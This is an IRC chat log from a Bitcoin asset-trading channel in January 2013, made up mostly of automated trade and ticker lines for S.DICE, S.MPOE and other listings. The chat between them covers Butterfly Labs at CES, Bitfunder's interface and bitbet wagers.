video Jan 12 00:06:40 inaba is teh cornered dog Jan 12 00:08:00 ;;ticker Jan 12 00:08:01 BTCUSD ticker | Best bid: 14.25010, Best ask: 14.33899, Bid-ask spread: 0.08889, Last trade: 14.25003, 24 hour volume: 31113.16064086, 24 hour low: 13.91001, 24 hour high: 14.34999, 24 hour vwap: 14.13473 Jan 12 00:08:05 hey-yo! Jan 12 00:08:17 o wow. Jan 12 00:10:08 [HAVELOCK] [SDICE] 9 @ 0.48 = 4.32 BTC [-] Jan 12 00:11:32 tankage Jan 12 00:17:08 "Epic video on the way. BFL a total scam, they act exactly as scammers would and I will show you a perfect side-by-side comparison of how a real business would look at CES vs. a total, utter scam." Jan 12 00:17:10 lol Jan 12 00:17:26 should be a bet on how long the bitpay people continue to carry bfl & btcmag Jan 12 00:17:52 they are true believers Jan 12 00:18:12 is that the micon video? Jan 12 00:18:16 Bugpowder yeah Jan 12 00:18:23 pigeons that's how people get taken to the cleanners. Jan 12 00:18:35 yes, i've noticed Jan 12 00:20:08 hm Jan 12 00:22:39 hm Jan 12 00:23:02 ok, i just blew out my fucking cabling Jan 12 00:23:56 huh Jan 12 00:24:18 Micon seems pretty likable IRL. Jan 12 00:24:26 i don't trust wireless. consequently all my stuff is wired. Jan 12 00:24:35 sometimes i nearly kill myself tripping on the shit Jan 12 00:37:47 [MPEX] [S.DICE] 1003 @ 0.00456243 = 4.5761 BTC [-] Jan 12 00:37:49 [MPEX] [S.DICE] 303 @ 0.00456242 = 1.3824 BTC [-] Jan 12 00:40:04 [MPEX] [S.DICE] 350 @ 0.00458215 = 1.6038 BTC [+] Jan 12 00:40:06 [MPEX] [S.DICE] 91 @ 0.004583 = 0.4171 BTC [+] Jan 12 00:40:07 [MPEX] [S.DICE] 633 @ 0.00465845 = 2.9488 BTC [+] Jan 12 00:50:36 How the Avalon countdown works.... http://imgs.xkcd.com/comics/countdown.png Jan 12 00:51:51 lol Jan 12 00:53:22 [MPEX] [S.DICE] 3426 @ 0.00465845 = 15.9598 BTC [+] Jan 12 00:59:48 mircea_popescu: odds are against Jan 12 01:00:33 who to the whaT? Jan 12 01:00:35 not sure how it works if mum is similarly afflicted Jan 12 01:00:48 gingervitis is a recessive mutation Jan 12 01:01:03 oslt, soon to be extinct Jan 12 01:01:17 allah be praised Jan 12 01:02:32 [MPEX] [S.DICE] 174 @ 0.00470334 = 0.8184 BTC [+] Jan 12 01:03:57 soul stealing fireboxen Jan 12 01:04:47 heh someone sold 10k Jan 12 01:05:07 jcpham: I think inaba said it was teh second day in a row he had shown up to troll them and was there last year Jan 12 01:07:06 sneaky Jan 12 01:14:04 [MPEX] [S.DICE] 900 @ 0.00456242 = 4.1062 BTC [-] Jan 12 01:18:47 ;;seen smickles Jan 12 01:18:48 smickles was last seen in #bitcoin-assets 1 day, 4 hours, 56 minutes, and 19 seconds ago: ;;ticker Jan 12 01:18:52 boo Jan 12 01:20:42 hi, can someone explain me the purpose of the bot's orders that sell 0.01 btc to the bid price after each buying ? Jan 12 01:21:10 that lowers the price but i still don't figure out if it's a bullish or bearish purpose Jan 12 01:21:30 on Mtgox BTC/USD Jan 12 01:22:37 mircea_popescu: convert the bot to cuda and use monte carlo Jan 12 01:23:22 huh ? Jan 12 01:23:48 here is a picture Jan 12 01:23:50 http://uppix.net/9/5/4/68906b587e8761bc819afef02b1d1.jpg Jan 12 01:23:51 StarenseN it'd seem the bot influences the last sell signal Jan 12 01:23:53 some people use it. Jan 12 01:24:21 as in, basing deals off the mtgox last. Jan 12 01:24:37 ok but is it bullish (price seems lower to buyers) or bearish purpose (to lower the price each time it's possible) ? i can't figure it out Jan 12 01:25:14 and maybe that technic has a name ? Jan 12 01:25:51 it's bearish except when its bullish Jan 12 01:25:58 mircea_popescu: www.nvidia.com/object/computational_finance.html Jan 12 01:27:00 i'd like to get rid off these ridicult amount of orders that monitor wrongly the price on my software sierra chart, do you think it's possible ? Jan 12 01:27:06 StarenseN i don't know tbh. Jan 12 01:27:30 to remove the input of orders @ 0.01btc Jan 12 01:27:49 ok mircea_popescu, good to know Jan 12 01:27:55 that's so dumb Jan 12 01:35:44 mircea_popescu the bitcoin godfather Jan 12 01:37:51 no, he's the bitcoin's conscience Jan 12 01:42:20 http://trilema.com/2013/preemptive-strike-to-have-on-hand-for-when-butterfly-labs-gets-hauled-off-to-jail-in-corpore/ Jan 12 01:42:22 dun dun dun. Jan 12 01:42:27 speak of teh wolf. Jan 12 02:10:56 [MPEX] [S.DICE] 1150 @ 0.00456242 = 5.2468 BTC [-] Jan 12 02:11:33 [MPEX] [S.MPOE] 3550 @ 0.00063367 = 2.2495 BTC [-] Jan 12 02:11:34 [MPEX] [S.MPOE] 6767 @ 0.00063471 = 4.2951 BTC [+] Jan 12 02:13:55 I consider to reply to this: https://bitcointalk.org/index.php?topic=118551.msg1448498#msg1448498 Jan 12 02:14:13 "Since MPEx discountinued withdrawals, I do what I can." Jan 12 02:14:13 [MPEX] [S.DICE] 512 @ 0.00456242 = 2.336 BTC [-] Jan 12 02:15:05 jurov lmao Jan 12 02:18:29 [MPEX] [S.DICE] 1750 @ 0.00458146 = 8.0176 BTC [+] Jan 12 02:32:25 Ukto https://bitcointalk.org/index.php?topic=135952.0 might interest you Jan 12 03:00:10 [MPEX] [S.DICE] 479 @ 0.00456242 = 2.1854 BTC [-] Jan 12 03:00:12 [MPEX] [S.DICE] 221 @ 0.00456241 = 1.0083 BTC [-] Jan 12 03:04:35 [MPEX] [S.MPOE] 5243 @ 0.00063471 = 3.3278 BTC [+] Jan 12 03:04:36 [MPEX] [S.MPOE] 5500 @ 0.00063774 = 3.5076 BTC [+] Jan 12 03:06:02 [MPEX] [S.DICE] 1200 @ 0.00458146 = 5.4978 BTC [+] Jan 12 03:09:08 [MPEX] [S.DICE] 1129 @ 0.00456241 = 5.151 BTC [-] Jan 12 03:09:10 [MPEX] [S.DICE] 1571 @ 0.00455779 = 7.1603 BTC [-] Jan 12 03:26:10 ;;seen mod6 Jan 12 03:26:11 mod6 was last seen in #bitcoin-assets 1 day, 0 hours, 9 minutes, and 49 seconds ago: or end up featured in another trilima article Jan 12 03:31:02 [MPEX] [S.DICE] 400 @ 0.00455779 = 1.8231 BTC [-] Jan 12 03:42:56 any lawyers up in heeere Jan 12 03:49:27 I was originally dead set against bitfunder, and planned to claim my shares at btct. the more I see look at each one, i see that btct is a bunch of drama. Jan 12 03:49:27 all over the place people using it to post msgs against each other, vote each other. first I was checking the website alot, to see what was there. then as things grew, so did the drama, I got tired of trying to use the votes as a usefull reference. almost all traded assets have some kind of negative mark, mud slung in their face, and its like getting opinionated scammer votes to me. Jan 12 03:49:42 teh crowdsourcing of finance has its limits. Jan 12 04:07:53 mircea_popescu: do any of the stocks on MPEx have voting rights? Jan 12 04:14:05 [MPEX] [S.DICE] 252 @ 0.00455779 = 1.1486 BTC [-] Jan 12 04:15:09 So BFL and youtube videos... Jan 12 04:15:18 [MPEX] [S.MPOE] 1802 @ 0.00063395 = 1.1424 BTC [-] Jan 12 04:17:44 jcpham: heh Jan 12 04:17:58 I watched it Jan 12 04:18:19 I'm thinking surely someone must've known it was micon Jan 12 04:18:32 Otherwise facepalm Jan 12 04:18:44 Massive unmitigated facepalm Jan 12 04:25:13 [MPEX] [S.DICE] 1267 @ 0.00455779 = 5.7747 BTC [-] Jan 12 04:25:43 anyone here saw reds ? Jan 12 04:25:48 keaton/beatty Jan 12 04:26:01 thestringpuller no. Jan 12 04:31:39 [MPEX] [S.DICE] 2391 @ 0.00455779 = 10.8977 BTC [-] Jan 12 04:31:40 [MPEX] [S.DICE] 2309 @ 0.00455778 = 10.5239 BTC [-] Jan 12 04:41:41 [MPEX] [S.DICE] 1000 @ 0.00457666 = 4.5767 BTC [+] Jan 12 04:46:05 [MPEX] [S.DICE] 941 @ 0.00455778 = 4.2889 BTC [-] Jan 12 04:46:47 [MPEX] [S.DICE] 753 @ 0.00455121 = 3.4271 BTC [-] Jan 12 04:53:29 [BTCTC] [BTC-TRADING-PT] 50 @ 0.1432 = 7.16 BTC [-] Jan 12 04:55:44 [MPEX] [S.DICE] 197 @ 0.00455121 = 0.8966 BTC [-] Jan 12 04:55:46 [MPEX] [S.DICE] 503 @ 0.00454943 = 2.2884 BTC [-] Jan 12 04:58:03 [MPEX] [S.DICE] 509 @ 0.00455183 = 2.3169 BTC [+] Jan 12 04:58:05 [MPEX] [S.DICE] 541 @ 0.00457666 = 2.476 BTC [+] Jan 12 04:58:48 [MPEX] [S.DICE] 232 @ 0.00457666 = 1.0618 BTC [+] Jan 12 04:58:49 [MPEX] [S.DICE] 526 @ 0.00458146 = 2.4098 BTC [+] Jan 12 05:02:51 [MPEX] [S.MPOE] 2050 @ 0.00065179 = 1.3362 BTC [+] Jan 12 05:09:46 [MPEX] [S.DICE] 429 @ 0.00460966 = 1.9775 BTC [+] Jan 12 05:09:47 [MPEX] [S.DICE] 617 @ 0.00462397 = 2.853 BTC [+] Jan 12 05:20:06 [MPEX] [S.DICE] 450 @ 0.00462397 = 2.0808 BTC [+] Jan 12 05:22:06 [HAVELOCK] [KCIM] 1 @ 0.999 BTC [-] Jan 12 05:23:05 [HAVELOCK] [SDICE] 1 @ 0.48 BTC [-] Jan 12 05:24:10 [MPEX] [S.DICE] 305 @ 0.00459284 = 1.4008 BTC [-] Jan 12 05:26:00 ;;later tell bugpowder : http://bitbet.us/bet/96/mpex-s-dice-price-ranges-0-00485-0-0045/ adjustable end weight. Jan 12 05:26:01 The operation succeeded. Jan 12 05:31:52 [BTCTC] [ESECURITYSABTC] 1 @ 0.74 BTC [+] Jan 12 05:36:48 ;;tslb Jan 12 05:36:56 Time since last block: 37 minutes and 1 second Jan 12 05:38:50 yay Jan 12 05:41:50 poke the eyeball. jeeeze http://bitbet.us/bet/94/sonny-vleisides-indicted-in-the-us/ Jan 12 05:46:45 mircea_popescu Awesome! Can't wait to throw up some serious coin on the next round. Maybe we will get some real sports bettors going now Jan 12 05:49:36 [MPEX] [S.DICE] 387 @ 0.00459284 = 1.7774 BTC [-] Jan 12 05:49:38 [MPEX] [S.DICE] 1413 @ 0.00456449 = 6.4496 BTC [-] Jan 12 05:54:50 ;;bc;stats Jan 12 05:54:51 Error: "bc;stats" is not a valid command. Jan 12 05:54:56 ;;bc Jan 12 05:54:56 Error: "bc" is not a valid command. Jan 12 05:55:04 ;;blarch Jan 12 05:55:05 Error: "blarch" is not a valid command. Jan 12 06:02:05 [HAVELOCK] [SDICE] 2 @ 0.48 = 0.96 BTC [-] Jan 12 06:05:35 [MPEX] [S.DICE] 900 @ 0.00456449 = 4.108 BTC [-] Jan 12 06:19:40 [MPEX] [S.DICE] 473 @ 0.00462397 = 2.1871 BTC [+] Jan 12 06:19:42 [MPEX] [S.DICE] 1427 @ 0.00462511 = 6.6 BTC [+] Jan 12 06:20:46 morning Jan 12 06:20:53 whats all this about CES ? Jan 12 06:21:18 i saw a random comment that josh@bfl showed up at CED with a couple android devices and a box of fans. x.x Jan 12 06:21:25 CES even Jan 12 06:21:45 you are not suppose to say that! Jan 12 06:21:54 0o, Jan 12 06:21:56 0,o Jan 12 06:22:13 wtf did I miss? lol Jan 12 06:22:22 you cant say its just a box of fans ya know Jan 12 06:22:30 i dont know anyhting Jan 12 06:22:32 even if it is Jan 12 06:22:33 just saw someones comment Jan 12 06:22:35 just. Jan 12 06:22:36 cant. Jan 12 06:22:55 what, did he show up with a unit, witih fans, and no board? Jan 12 06:22:55 :P Jan 12 06:23:19 yes Jan 12 06:23:26 and then micon tried to troll him Jan 12 06:23:30 and they both failed hard Jan 12 06:23:38 that video.. embarasing and hard to watch Jan 12 06:23:39 ;> Jan 12 06:23:47 video? Jan 12 06:23:48 wait, n/m Jan 12 06:23:50 i dont really care Jan 12 06:23:57 hehe Jan 12 06:24:11 well you asked i told. Jan 12 06:25:12 yeh good enough then hehe Jan 12 06:26:07 http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Jan 12 06:26:15 lol Jan 12 06:26:19 gj on the site. :) Jan 12 06:26:21 nice success Jan 12 06:26:26 thanks ;) Jan 12 06:26:46 i have a petty big card up my sleave atm Jan 12 06:26:53 hoping to pull it on everyone in about a week Jan 12 06:27:07 tat wil make ppl flip with impressiveness. :P Jan 12 06:27:43 might even be beneficial to you Jan 12 06:27:45 what about Jan 12 06:27:48 pm Jan 12 06:27:50 [MPEX] [S.DICE] 787 @ 0.00456449 = 3.5923 BTC [-] Jan 12 06:27:52 [MPEX] [S.DICE] 875 @ 0.00456032 = 3.9903 BTC [-] Jan 12 06:31:06 [MPEX] [S.DICE] 320 @ 0.00456032 = 1.4593 BTC [-] Jan 12 06:32:49 [MPEX] [S.DICE] 500 @ 0.00462511 = 2.3126 BTC [+] Jan 12 06:39:53 [MPEX] [S.DICE] 855 @ 0.00462511 = 3.9545 BTC [+] Jan 12 06:39:55 [MPEX] [S.DICE] 1045 @ 0.00465713 = 4.8667 BTC [+] Jan 12 06:44:53 [MPEX] [S.DICE] 367 @ 0.00465713 = 1.7092 BTC [+] Jan 12 06:44:55 [MPEX] [S.DICE] 360 @ 0.00465881 = 1.6772 BTC [+] Jan 12 06:45:49 [MPEX] [S.DICE] 884 @ 0.00465881 = 4.1184 BTC [+] Jan 12 06:50:37 Ukto: ........... Jan 12 06:53:32 wasup :) Jan 12 06:53:39 i havent had a chance to play to disc 2 yet Jan 12 06:53:39 lol Jan 12 07:06:26 [MPEX] [S.DICE] 105 @ 0.00456032 = 0.4788 BTC [-] Jan 12 07:06:28 [MPEX] [S.DICE] 245 @ 0.00454943 = 1.1146 BTC [-] Jan 12 07:09:46 [MPEX] [S.DICE] 1687 @ 0.00454943 = 7.6749 BTC [-] Jan 12 07:13:51 [MPEX] [S.DICE] 1615 @ 0.0045661 = 7.3743 BTC [+] Jan 12 07:16:06 [HAVELOCK] [SDICE] 5 @ 0.48 = 2.4 BTC [-] Jan 12 07:38:58 [MPEX] [S.DICE] 266 @ 0.0045661 = 1.2146 BTC [+] Jan 12 07:39:00 [MPEX] [S.DICE] 356 @ 0.00465881 = 1.6585 BTC [+] Jan 12 07:52:34 [MPEX] [S.MPOE] 2950 @ 0.00065179 = 1.9228 BTC [+] Jan 12 07:52:35 [MPEX] [S.MPOE] 10300 @ 0.0006518 = 6.7135 BTC [+] Jan 12 08:08:17 [MPEX] [S.DICE] 1259 @ 0.00467034 = 5.88 BTC [+] Jan 12 08:08:19 [MPEX] [S.DICE] 541 @ 0.00468259 = 2.5333 BTC [+] Jan 12 08:12:26 [MPEX] [S.DICE] 1000 @ 0.00465503 = 4.655 BTC [-] Jan 12 08:12:26 [MPEX] [S.DICE] 750 @ 0.00463405 = 3.4755 BTC [-] Jan 12 08:20:55 [MPEX] [S.DICE] 800 @ 0.00468259 = 3.7461 BTC [+] Jan 12 08:24:04 [MPEX] [S.DICE] 315 @ 0.00468259 = 1.475 BTC [+] Jan 12 08:24:06 [MPEX] [S.DICE] 104 @ 0.00468676 = 0.4874 BTC [+] Jan 12 08:54:07 [HAVELOCK] [SDICE] 1 @ 0.48 BTC [-] Jan 12 08:54:11 [HAVELOCK] [SDICE] 40 @ 0.48 = 19.2 BTC [-] Jan 12 08:56:21 [MPEX] [S.MPOE] 10650 @ 0.00065304 = 6.9549 BTC [+] Jan 12 09:01:31 [MPEX] [S.DICE] 1050 @ 0.00463405 = 4.8658 BTC [-] Jan 12 09:17:07 [MPEX] [S.DICE] 500 @ 0.00463406 = 2.317 BTC [+] Jan 12 09:17:09 [MPEX] [S.DICE] 700 @ 0.00463405 = 3.2438 BTC [-] Jan 12 09:17:10 [MPEX] [S.DICE] 150 @ 0.00462783 = 0.6942 BTC [-] Jan 12 09:31:09 [MPEX] [S.DICE] 450 @ 0.00468383 = 2.1077 BTC [+] Jan 12 09:36:23 [MPEX] [S.DICE] 226 @ 0.00462783 = 1.0459 BTC [-] Jan 12 09:36:25 [MPEX] [S.DICE] 224 @ 0.00460126 = 1.0307 BTC [-] Jan 12 09:42:15 [MPEX] [S.DICE] 150 @ 0.00468383 = 0.7026 BTC [+] Jan 12 09:42:18 [MPEX] [S.DICE] 1600 @ 0.00468385 = 7.4942 BTC [+] Jan 12 09:42:18 [MPEX] [S.DICE] 50 @ 0.00468676 = 0.2343 BTC [+] Jan 12 09:46:02 [MPEX] [S.DICE] 593 @ 0.00468676 = 2.7792 BTC [+] Jan 12 09:53:07 [MPEX] [S.MPOE] 5100 @ 0.00065304 = 3.3305 BTC [+] Jan 12 09:53:08 [MPEX] [S.MPOE] 10200 @ 0.00064675 = 6.5969 BTC [-] Jan 12 09:53:09 [MPEX] [S.MPOE] 7400 @ 0.00064537 = 4.7757 BTC [-] Jan 12 09:56:49 [MPEX] [S.DICE] 253 @ 0.00468676 = 1.1858 BTC [+] Jan 12 09:56:51 [MPEX] [S.DICE] 697 @ 0.00470237 = 3.2776 BTC [+] Jan 12 10:01:07 [MPEX] [S.DICE] 600 @ 0.00470237 = 2.8214 BTC [+] Jan 12 10:21:34 [MPEX] [S.DICE] 203 @ 0.00470237 = 0.9546 BTC [+] Jan 12 10:21:36 [MPEX] [S.DICE] 406 @ 0.00470807 = 1.9115 BTC [+] Jan 12 10:22:53 [MPEX] [S.DICE] 800 @ 0.00464993 = 3.7199 BTC [-] Jan 12 10:22:55 [MPEX] [S.DICE] 200 @ 0.0046461 = 0.9292 BTC [-] Jan 12 10:28:17 [MPEX] [S.DICE] 1657 @ 0.00469177 = 7.7743 BTC [+] Jan 12 10:35:01 [MPEX] [S.DICE] 393 @ 0.00469177 = 1.8439 BTC [+] Jan 12 10:35:02 [MPEX] [S.DICE] 300 @ 0.0046461 = 1.3938 BTC [-] Jan 12 10:35:03 [MPEX] [S.DICE] 1226 @ 0.00460126 = 5.6411 BTC [-] Jan 12 10:43:08 [MPEX] [S.DICE] 667 @ 0.00457452 = 3.0512 BTC [-] Jan 12 10:43:38 [MPEX] [S.BBET] 148 @ 0.002 = 0.296 BTC [+] Jan 12 10:45:21 !ticker m s.dice Jan 12 10:45:23 [MPEX:S.DICE] 1D: 0.00454863 / 0.00471763 / 0.0048 (310974 shares, 1,467.06 BTC), 7D: 0.00428 / 0.00465741 / 0.0048 (1920758 shares, 8,945.76 BTC), 30D: 0.0014 / 0.00348807 / 0.0048 (14415063 shares, 50,280.85 BTC) Jan 12 10:45:24 [MPEX] [S.DICE] 800 @ 0.0045939 = 3.6751 BTC [+] Jan 12 10:52:44 mircea, you dabble in rl-stock, in particular that of pharmaceutical concerns like bayer, novartis, pfizer etc.? Jan 12 11:02:11 [MPEX] [S.DICE] 800 @ 0.0045939 = 3.6751 BTC [+] Jan 12 11:02:12 [MPEX] [S.DICE] 200 @ 0.00459751 = 0.9195 BTC [+] Jan 12 11:09:08 [MPEX] [S.DICE] 500 @ 0.00459751 = 2.2988 BTC [+] Jan 12 11:11:20 [MPEX] [S.DICE] 974 @ 0.00459751 = 4.478 BTC [+] Jan 12 11:21:44 [MPEX] [S.DICE] 600 @ 0.00457452 = 2.7447 BTC [-] Jan 12 11:28:04 [MPEX] [S.DICE] 453 @ 0.00457452 = 2.0723 BTC [-] Jan 12 11:28:05 [MPEX] [S.DICE] 74 @ 0.00456456 = 0.3378 BTC [-] Jan 12 11:30:47 [MPEX] [S.DICE] 1300 @ 0.00456456 = 5.9339 BTC [-] Jan 12 11:52:41 [MPEX] [S.DICE] 500 @ 0.00458264 = 2.2913 BTC [+] Jan 12 11:52:43 [MPEX] [S.DICE] 26 @ 0.00456456 = 0.1187 BTC [-] Jan 12 11:52:44 [MPEX] [S.DICE] 952 @ 0.00455323 = 4.3347 BTC [-] Jan 12 11:52:45 [MPEX] [S.DICE] 522 @ 0.00454914 = 2.3747 BTC [-] Jan 12 12:08:38 [MPEX] [S.DICE] 1007 @ 0.00459751 = 4.6297 BTC [+] Jan 12 12:08:40 [MPEX] [S.DICE] 450 @ 0.00462303 = 2.0804 BTC [+] Jan 12 12:08:41 [MPEX] [S.DICE] 435 @ 0.00467307 = 2.0328 BTC [+] Jan 12 12:20:21 [MPEX] [S.DICE] 1000 @ 0.00454915 = 4.5492 BTC [-] Jan 12 12:20:22 [MPEX] [S.DICE] 200 @ 0.00454914 = 0.9098 BTC [-] Jan 12 12:26:36 [MPEX] [S.DICE] 1150 @ 0.00454914 = 5.2315 BTC [-] Jan 12 12:28:45 [MPEX] [S.DICE] 600 @ 0.00461263 = 2.7676 BTC [+] Jan 12 12:28:47 [MPEX] [S.DICE] 450 @ 0.00465244 = 2.0936 BTC [+] Jan 12 12:33:28 [MPEX] [S.MPOE] 1289 @ 0.00064537 = 0.8319 BTC [-] Jan 12 12:33:30 [MPEX] [S.MPOE] 511 @ 0.00062772 = 0.3208 BTC [-] Jan 12 12:36:13 [BTCTC] [RSM] 1 @ 0.0065 BTC Jan 12 12:40:09 [BTCTC] [GSDPT] 1 @ 0.007 BTC [-] Jan 12 12:45:23 what does 1 GSDPT = in S.DICE? Jan 12 12:55:51 [MPEX] [S.DICE] 93 @ 0.00454914 = 0.4231 BTC [-] Jan 12 12:55:52 [MPEX] [S.DICE] 826 @ 0.00454863 = 3.7572 BTC [-] Jan 12 12:55:54 [MPEX] [S.DICE] 368 @ 0.00454712 = 1.6733 BTC [-] Jan 12 13:01:07 jurov ? Jan 12 13:02:56 new main menu on bitfunder :) Jan 12 13:03:23 ;;tslb Jan 12 13:03:25 Time since last block: 33 minutes and 45 seconds Jan 12 13:10:37 Ukto: but would be nice if ballance is always visible Jan 12 13:25:56 its not? Jan 12 13:26:11 new main menu? x.x Jan 12 13:26:31 the red button Jan 12 13:27:22 i have no idea what you are talking about LOL Jan 12 13:28:00 u didnt change the layout? Jan 12 13:28:30 it looks the same to me ? Jan 12 13:28:46 screen shot it Jan 12 13:28:58 i wanna see what your talking about Jan 12 13:29:06 ok, will do Jan 12 13:29:35 the only changes I have made in a week is the transfer tab, and bold to normal on the market pge Jan 12 13:29:37 page Jan 12 13:30:36 just need to find that screenshot tool, wait Jan 12 13:31:04 windows? Jan 12 13:31:15 no, mac Jan 12 13:31:16 press the 'print screen' button Jan 12 13:31:18 hm Jan 12 13:31:22 should still be able to use print screen Jan 12 13:31:43 will copy the desktop to clipboard Jan 12 13:31:49 to paste into photshop or something Jan 12 13:32:07 found it already (grab) Jan 12 13:33:03 now need somewhere to post it Jan 12 13:33:47 [MPEX] [S.DICE] 32 @ 0.00454712 = 0.1455 BTC [-] Jan 12 13:33:49 [MPEX] [S.DICE] 300 @ 0.00454415 = 1.3632 BTC [-] Jan 12 13:33:50 [MPEX] [S.DICE] 903 @ 0.00454181 = 4.1013 BTC [-] Jan 12 13:35:33 Ukto: http://imgur.com/BgY8x Jan 12 13:36:50 is that just me and my browser? Jan 12 13:39:03 oh that Jan 12 13:39:04 lol Jan 12 13:39:08 expand the width of the window Jan 12 13:39:12 make it much wider Jan 12 13:39:14 it goes away Jan 12 13:39:24 thats ment more for mobile phones etc Jan 12 13:39:27 to click to expand the menu Jan 12 13:39:29 [MPEX] [S.DICE] 576 @ 0.00454181 = 2.6161 BTC [-] Jan 12 13:39:31 [MPEX] [S.DICE] 74 @ 0.00453569 = 0.3356 BTC [-] Jan 12 13:39:51 ah, hehe, that's why Jan 12 13:40:11 made my window smaller Jan 12 13:41:13 [MPEX] [S.DICE] 601 @ 0.00457149 = 2.7475 BTC [+] Jan 12 13:45:21 [MPEX] [S.DICE] 427 @ 0.00457149 = 1.952 BTC [+] Jan 12 13:45:23 [MPEX] [S.DICE] 173 @ 0.0045737 = 0.7913 BTC [+] Jan 12 13:57:24 [BTCTC] [GSDPT] 100 @ 0.007 = 0.7 BTC [-] Jan 12 14:05:02 [MPEX] [S.DICE] 436 @ 0.0045737 = 1.9941 BTC [+] Jan 12 14:05:04 [MPEX] [S.DICE] 664 @ 0.00465244 = 3.0892 BTC [+] Jan 12 14:34:53 [MPEX] [S.DICE] 136 @ 0.00465244 = 0.6327 BTC [+] Jan 12 14:34:55 [MPEX] [S.DICE] 64 @ 0.00467307 = 0.2991 BTC [+] Jan 12 14:35:47 https://bitcointalk.org/index.php?topic=87934.msg1449410#msg1449410 Jan 12 14:35:51 this shit... i can't even Jan 12 14:36:10 pigeons iirc 1gsdpt = 1 s.dice Jan 12 14:38:03 [MPEX] [S.DICE] 1310 @ 0.00467307 = 6.1217 BTC [+] Jan 12 14:38:05 [MPEX] [S.DICE] 290 @ 0.0046746 = 1.3556 BTC [+] Jan 12 14:38:35 wow .007 Jan 12 14:38:43 but on 100 ;) Jan 12 14:40:34 crazy. Jan 12 14:40:45 [MPEX] [S.DICE] 1449 @ 0.0046746 = 6.7735 BTC [+] Jan 12 14:40:47 [MPEX] [S.DICE] 451 @ 0.00468023 = 2.1108 BTC [+] Jan 12 15:01:10 [HAVELOCK] [SDICE] 11 @ 0.48 = 5.28 BTC [-] Jan 12 15:03:42 [MPEX] [S.DICE] 912 @ 0.00453569 = 4.1365 BTC [-] Jan 12 15:05:07 i think satoshi dice passthroughs have jumped the shark Jan 12 15:06:36 Ukto: where can we tip you to consider using assbot ? Jan 12 15:07:16 [MPEX] [S.DICE] 907 @ 0.00458755 = 4.1609 BTC [+] Jan 12 15:08:00 ya srsly, what's keeping him ? Jan 12 15:09:24 mircea_popescu: he's mad because he implemented the twitter interface first and then got told it's not current anymore i think Jan 12 15:09:47 eh come on. Jan 12 15:10:26 obviously people will see a bf trade stream by, decide the price is interesting and they should go trade or make an account = profit Jan 12 15:11:15 that's what i think too Jan 12 15:12:54 the Foundation has decreed that from now on BFL, BTC Mag, and Bitpay ARE = "Bitcoin" Jan 12 15:18:14 the who ? Jan 12 15:18:47 The Foundation (PBUT) Jan 12 15:18:52 never heard of em. Jan 12 15:19:03 well I made it up anyway Jan 12 15:19:30 you should instead contribute to that person's 1050 btc fund Jan 12 15:19:53 [MPEX] [S.MPOE] 8250 @ 0.0006578 = 5.4269 BTC [+] Jan 12 15:20:56 [MPEX] [S.DICE] 250 @ 0.00458755 = 1.1469 BTC [+] Jan 12 15:21:56 https://bitcointalk.org/index.php?topic=135985.0 Jan 12 15:22:01 in case not everyone has seen that Jan 12 15:29:27 [MPEX] [S.DICE] 914 @ 0.00453569 = 4.1456 BTC [-] Jan 12 15:29:28 [MPEX] [S.DICE] 558 @ 0.00453301 = 2.5294 BTC [-] Jan 12 15:30:38 [MPEX] [S.DICE] 884 @ 0.00453301 = 4.0072 BTC [-] Jan 12 15:35:43 [MPEX] [S.DICE] 299 @ 0.00458755 = 1.3717 BTC [+] Jan 12 15:35:44 [MPEX] [S.DICE] 649 @ 0.00468023 = 3.0375 BTC [+] Jan 12 15:35:45 [MPEX] [S.DICE] 852 @ 0.00468482 = 3.9915 BTC [+] Jan 12 16:08:10 [MPEX] [S.DICE] 602 @ 0.00453485 = 2.73 BTC [-] Jan 12 16:11:44 [MPEX] [S.DICE] 426 @ 0.00453485 = 1.9318 BTC [-] Jan 12 16:11:46 [MPEX] [S.DICE] 3574 @ 0.00454341 = 16.2381 BTC [+] Jan 12 16:15:19 [MPEX] [S.DICE] 200 @ 0.00454189 = 0.9084 BTC [-] Jan 12 16:28:18 jurov: live.coinbr.com down? Jan 12 16:29:48 i don't see it either. 502 Jan 12 16:37:14 [MPEX] [S.DICE] 400 @ 0.00454279 = 1.8171 BTC [+] Jan 12 16:41:00 so i got Critticall workin on my forex data, this is the most awesome shit ive seen. Jan 12 16:46:28 !ticker Jan 12 16:46:29 Provide exchange and ticker. Jan 12 16:46:30 ;;ticker Jan 12 16:46:31 BTCUSD ticker | Best bid: 14.13148, Best ask: 14.16500, Bid-ask spread: 0.03352, Last trade: 14.13148, 24 hour volume: 47145.03484939, 24 hour low: 13.95000, 24 hour high: 14.34999, 24 hour vwap: 14.15034 Jan 12 16:46:40 ;;calc 0.23456 * 14.15034 Jan 12 16:46:40 3.3191037504 **** BEGIN LOGGING AT Sat Jan 12 22:14:29 2013 Jan 12 22:15:18 So, when will the BTC-USD rally crash again in your opinion? Jan 12 22:16:01 [MPEX] [S.DICE] 149 @ 0.00453303 = 0.6754 BTC [-] Jan 12 22:16:03 [MPEX] [S.DICE] 1251 @ 0.00453301 = 5.6708 BTC [-] Jan 12 22:16:28 Schadenfreude: what rally? Jan 12 22:17:11 ;;ticker Jan 12 22:17:12 BTCUSD ticker | Best bid: 14.21501, Best ask: 14.22600, Bid-ask spread: 0.01099, Last trade: 14.21501, 24 hour volume: 42917.05982446, 24 hour low: 13.95000, 24 hour high: 14.34999, 24 hour vwap: 14.14843 Jan 12 22:17:58 not really much is it. Jan 12 22:19:29 I sold some spare BTC and will prolly buy some again when it drops 5% orso Jan 12 22:20:01 doesn't look too likely. Jan 12 22:21:30 [MPEX] [S.DICE] 1400 @ 0.00462102 = 6.4694 BTC [+] Jan 12 22:21:49 [BTCTC] [BASIC-MINING] 4 @ 0.33 = 1.32 BTC Jan 12 22:22:39 Meh, mining bonds/stocks aren't too bad - early on. Jan 12 22:22:49 http://cryptobill.com/ Jan 12 22:22:54 da fuck, we're still doing this ? Jan 12 22:23:22 Please note: Cryptobill should not be considered a secure method of transferring a significant amount of BTC. Since, according to the Federal Reserve, the life span of a US dollar bill is less than five years, it is also not recommended to use Cryptobill to store bitcoins for a significant length of time. Administrators of Cryptobill.com reserve the right to import BTC left at addresses for more than five years. Jan 12 22:23:23 pff Jan 12 22:23:33 ukto wtf ?! Jan 12 22:25:38 [MPEX] [S.DICE] 1184 @ 0.00462102 = 5.4713 BTC [+] Jan 12 22:35:02 [MPEX] [S.DICE] 1176 @ 0.00462102 = 5.4343 BTC [+] Jan 12 22:43:21 markedathome, +1. it made me preemptively confirm the details on #bitvps. also, 'merican date format (but am perhaps accustomed already). Jan 12 22:44:02 